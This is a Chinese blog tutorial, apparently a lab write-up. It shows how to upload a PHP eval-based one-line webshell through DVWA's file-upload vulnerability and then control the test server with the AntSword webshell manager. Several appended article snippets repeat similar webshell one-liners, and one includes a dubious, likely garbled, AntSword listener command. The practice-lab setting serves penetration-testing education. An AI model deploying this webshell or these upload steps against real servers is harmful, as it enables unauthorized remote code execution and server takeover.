蚁剑+DVWA(文件上传漏洞Upload)

最新推荐文章于 2025-03-24 16:59:33 发布
最新推荐文章于 2025-03-24 16:59:33 发布
阅读量6.6k 收藏 28
点赞数 6
文章标签: DVWA 蚁剑 文件上传漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42342141/article/details/102815402
版权
本文演示了如何利用蚁剑(AntSword)工具,通过DVWA平台的文件上传漏洞(Upload)获取webshell的过程。从上传包含后门的PHP文件开始,到使用蚁剑连接并成功控制目标服务器,最后验证文件管理功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

蚁剑+DVWA(文件上传漏洞Upload)

0x00 工具

虚拟机:owasp-bwa
主机:windows10
蚁剑 AntSword

0x01 文件上传漏洞(Upload)

第一步:登入DVWA
在这里插入图片描述注:这里使用的是low等级,毕竟目的是演示如何蚁剑的连接

第二步:准备hack.php

<?php
@eval($_POST['hack'])
?>

第三步:从DVWA上传hack.php

显示上传成功!
接下来我们来owasp-bwa服务器的目录下检查是否含有hack.php

cd /var/www/dvwa/hackable/uploads
ls

在这里插入图片描述
看到这就很 nice !

第四步:使用蚁剑来连接获得webshell
在这里插入图片描述在空白处 右键 -->添加数据

在这里插入图片描述
url处理
在这里插入图片描述

http://192.168.47.130/dvwa/vulnerabilities/upload/#
../../hackable/uploads/hack.php

把上面的url和文件路径拼在一起  记得去掉url后面的 #
然后得到下面的新 url 并打开
http://192.168.47.130/dvwa/vulnerabilities/upload/../../hackable/uploads/hack.php

打开后url变成:http://192.168.47.130/dvwa/hackable/uploads/hack.php
这就是蚁剑填入的链接

连接密码是指 hack.php 里 通过POST提交的 数据 即 hack

<?php
@eval($_POST['hack'])
?>

编码器一般选择 chr 就行了

点击 添加 然后 右键 添加的项目
在这里插入图片描述
接下来我们可以对目标服务器进行相关操作了!!!

e.g. 文件管理
我们可以试着去新建个文件试试 test.txt 然后到服务器的目录下检测
在这里插入图片描述
在这里插入图片描述
创建成功!!!

至此蚁剑通过DVWA文件上传漏洞的进行的连接就完成了

【Web安全】中国+DVWA(本地文件上传漏洞Upload
李响
03-22 2339
文章目录1 中国2 文件上传漏洞Upload)2.1 准备hack.php2.2 从DVWA上传hack.php3 使用连接获得webshell 1 中国 中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 数据配置管理 虚拟终端操作 文件管理 数据库管理 ...
打点神器AntSword(中国)联动dvwa文件上传漏洞实验过程
weixin_69925635的博客
05-31 565
本机:kali 靶机:ubuntu18.04,安装dvwa,url:192.168.204.132/dvwa。写入一句话木马,进入192.168.204.132/dvwa文件上传漏洞下,将一句话木马上传。打开,右键新增数据,填写url和密码,这里url要逐步拼接直到不出现404。点击初始化,并选择刚刚创建的另一个文件夹,这个时候会开始自行安装核心源码。下载完毕后解压,并在当前文件夹下再建一个文件夹,要求不能有中文和重复名字。再次回到加载器目录,启动,开始使用。
dvwa靶场:File Upload系列】File Upload低-中-高级别,通关啦
m0_47484034的博客
11-25 1061
dvwa靶场:File Upload系列】File Upload低-中-高级别,通关啦
中国基本操作
最新发布
qq_25096749的博客
03-24 209
2、上传木马到DVWA并通过连接并完成测试和添加,注意连接前先清空所有缓存。当通过webshell拿到站点后就可以使用来完成后渗透操作。4、还可以连接数据库-右键数据操作——点击添加。3、添加后就可以去管理数据了。1、编写webshell。
文件上传漏洞--dvwa
m0_62202418的博客
11-26 519
2. 上传一句话木马<?phpinfo();上传失败,提示只能上传JPEG、PNG格式的文件,应该是对文件的类型做了限制。4. PHP 代码成功运行,尝试连接连接成功。将文件类型改为image/png提示上传成功。5. PHP 代码成功运行,尝试进行连接。3. 上传成功,文件路径已经给出,访问一下。此处,对文件的类型和大小做了过滤。1. 启动dvwa 靶场。1. 尝试上传一句话木马。
DVWA文件上传漏洞upload
kirito_pio的博客
06-04 1906
目录 1、low级别(直接上传) 1.1 上传文件 1.2验证 2、medium级别(使用Burp Suite进行代理) 2.1 进行代理配置 2.2 文件上传 2.3 验证 3、high级别(进行文件合并) 3.1 文件创建 3.2上传及验证 1、low级别(直接上传) <?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable..
上传下载、越权和逻辑漏洞
2301_81413442的博客
12-24 1553
熟悉上传下载、越权和逻辑漏洞
中国+burpsuite+webshell文件上传(超完整)
qq_50953689的博客
05-14 3200
之前:需要打开phpstudy的靶场环境 第一步 ➊准备木马文件 新建木马文件ttx.php,文件内容为 <?php @eval($_REQUEST["shell"]); ?> ➋保存后,将文件后缀名php改为jpg ➌登录dvwa测试环境,将security等级改为‘low’(其它模式,后端也做了校验,无法完成第⑤步的操作),然后打开文件上传模块 ➍上传文件,选择第②步保存的shell.jpg,在点击‘Upload’之前,打开burpsuite拦截功能并且点击‘Upl
DVWA文件上传漏洞之High渗透测试
Xlucas的博客
08-11 690
DVWA文件上传漏洞之High的渗透测试
DVWA】17. File Upload 文件上传报错长段+Low+Medium)
Zichel77的博客
01-10 1289
这段代码在文件上传部分没有明确的防范措施来确保上传的文件的安全性。它只检查了文件是否成功移动到目标路径,并根据结果输出相应的消息。因为缺乏对上传文件的有效验证和过滤机制,这可能导致安全漏洞
dvwa靶场文件上传--high难度--连接
2401_85397851的博客
08-01 1199
选择DVWA Security,把impossible改成high(其他模式也改成high),改好之后再选择File Upload,如果把安全等级调成高了以后,我们只能上传像jpg,png,jpeg(这种后缀的)的图片,而且注意,上传的高度不能超过100KB,如果想要了解的,可以查看网页源代码或者看一下。如果损坏是传不上去的。
web渗透测试实战-DVWA-文件上传漏洞(High-高级),菜刀工具-
qq_39174983的博客
12-30 7111
本文将描述小白本白在进行DVWA-文件上传漏洞(高级)实战时的完成步骤,以及所遇到的问题
[极客大挑战 2019]Knife 1(连接/安装)
weixin_45253573的博客
11-18 906
打开环境 eval($_POST[“Syc”]); 作为后门用post提交一个字符串Syc 直接拿连接 连接之后在根目录下发现了flag 获取flag 介绍一下的安装: AntSword-Loader:https://github.com/AntSwordProject/AntSword-Loader antSword:https://github.com/AntSwordProject/antSword 这两个下载好之后解压 在AntSword-Loader-v4.0.3-win32
如何用dvwa靶场上传文件,再用中国连接(high)
m0_73128456的博客
11-12 3160
单击右键,点击浏览网站,然后把dvwa后面全部删除,再按回车键,输入自己靶场的用户名和密码,再把密码等级改为高级(high)然后,再找cookie值。第五步:打开中国,增加数据,然后填写URL地址,填写自己的文件上传的位置。连接密码,这个时候,返回值为空,不要着急,只要你如下填写就行。前面是自己的IP地址,后面是自己上传文件的位置。第八步:点击你的数据,右键选择编辑数据,然后,点击请求信息,点击。第六步:先保存数据,现在还不可以,还要加靶场的cookie值。然后,加cookie值,粘贴,向我这样。
使用 文件上传漏洞挖掘
qq_65420677的博客
03-03 319
文件上传漏洞挖掘
关于的安装和使用
hanjunhao2002的博客
02-02 2019
加载器: https://github.com/AntSwordProject/AntSword-Loader 核心源码: https://github.com/AntSwordProject/antSword 两者都下好之后运行exe文件 发现需要初始化,进行初始化,路径为你下载的源码路径 初始化成功后如下 将小马上传服务器后url地址填写小马的位置 后面两者都选base64 连接密码为小马里面默认的123 添加后连接成功如下 可以轻松控制权限
ctf之流量分析学习
一大口木的博客
11-13 2717
链接:https://pan.baidu.com/s/1e3ZcfioIOmebbUs-xGRnUA?pwd=9jmc提取码:9jmc前几道比较简单,是经常见、常考到的类型。
的使用
2401_83943410的博客
10-29 437
这里的连接密码为:cmd,因为shell.php文件中为cmd。打开鼠标右击,点击添加数据。输入url和连接密码。
中国安装使用教程
Karka_的博客
03-21 5402
中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。如上主要包括的下载,连接一句话木马,更改木马连接参数,绕过WAF。
dvwa文件上传漏洞
01-03
### DVWA 文件上传漏洞利用方法 #### 一、文件上传漏洞概述 文件上传漏洞是指应用程序允许用户上传恶意文件到服务器上,这些文件可能被执行从而导致远程代码执行(RCE)[^1]。 #### 二、DVWA 中不同级别的文件上传漏洞 DVWA 提供了从低级到高级的不同难度设置来模拟真实环境中的文件上传漏洞: - **初级**:几乎没有任何防护措施,可以直接上传任意类型的文件。 - **中级**:增加了简单的文件扩展名检查机制,但仍存在绕过方式。 - **高级**:不仅验证文件扩展名还检测MIME类型,不过依然可以通过特定技巧突破安全防线[^2]。 #### 三、使用(AntSword)进行渗透测试的具体操作流程 为了成功利用DVWA高难度下的文件上传功能实现反向Shell连接,需按照如下方式进行配置和攻击尝试: 1. 准备工作阶段,在本地搭建好DVWA平台,并确保能够正常访问; 2. 下载并安装最新版本的客户端工具; 3. 编写或获取适用于PHP环境运行的小马(WebShell),注意调整其中的关键参数以适应目标主机的情况; 4. 登录进入DVWA界面后切换至“File Upload”选项卡处准备实施下一步动作之前记得保存当前会话产生的Cookie信息以便稍后加载入插件中作为身份认证凭证之一; 5. 尝试通过表单提交带有隐藏属性(如`<?php @eval($_POST['cmd']);?>`)的图片或其他看似无害但实际上嵌有可执行脚本的内容给服务端处理;此时如果一切顺利的话应该可以看到所选文件已被放置到了指定位置等待触发; 6. 打开软件新建站点项目输入相应URL地址以及刚才记录下来的Session ID完成初步关联绑定之后就可以直接调用内置的功能模块去寻找可能存在风险的地方进而加以控制管理了[^3]。 ```bash # 示例命令用于启动监听器 antsword -l 0.0.0.0 -p 8090 ```
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值